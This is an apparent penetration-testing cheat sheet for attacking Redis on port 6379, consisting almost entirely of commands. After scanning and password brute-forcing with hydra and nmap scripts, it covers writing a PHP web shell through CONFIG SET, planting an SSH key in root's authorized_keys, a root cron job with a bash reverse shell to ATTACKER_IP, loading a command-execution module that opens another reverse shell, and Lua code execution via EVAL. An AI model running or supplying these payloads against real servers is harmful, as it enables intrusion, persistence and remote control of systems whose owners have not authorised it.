6379 - Redis

nmap -sV -sC -p 6379 TARGET

redis-cli -h TARGET
redis-cli -h TARGET -a 'password'

redis-cli -h TARGET
> INFO

hydra -P passwords.txt redis://TARGET
nmap -p 6379 --script redis-brute TARGET

> INFO
> CONFIG GET *
> CONFIG GET dir
> CONFIG GET dbfilename
> KEYS *
> GET key_name
> SELECT 0           # Switch database

> CONFIG SET dir /var/www/html/
> CONFIG SET dbfilename shell.php
> SET payload "<?php system($_GET['cmd']); ?>"
> SAVE

ssh-keygen -t ed25519 -f /tmp/redis_key -N ""
(echo -e "\n\n"; cat /tmp/redis_key.pub; echo -e "\n\n") > /tmp/redis_payload.txt

cat /tmp/redis_payload.txt | redis-cli -h TARGET -x set ssh_key
redis-cli -h TARGET CONFIG SET dir /root/.ssh/
redis-cli -h TARGET CONFIG SET dbfilename authorized_keys
redis-cli -h TARGET SAVE

ssh -i /tmp/redis_key root@TARGET

redis-cli -h TARGET
> CONFIG SET dir /var/spool/cron/crontabs/
> CONFIG SET dbfilename root
> SET cron "\n\n* * * * * bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\n\n"
> SAVE

# Build
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand
make

# Upload module.so to target
redis-cli -h TARGET MODULE LOAD /path/to/module.so
redis-cli -h TARGET system.exec "id"
redis-cli -h TARGET system.exec "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

redis-cli -h TARGET EVAL "return io.popen('id'):read('*a')" 0

nmap -p 6379 --script redis-info TARGET
nmap -p 6379 --script redis-brute TARGET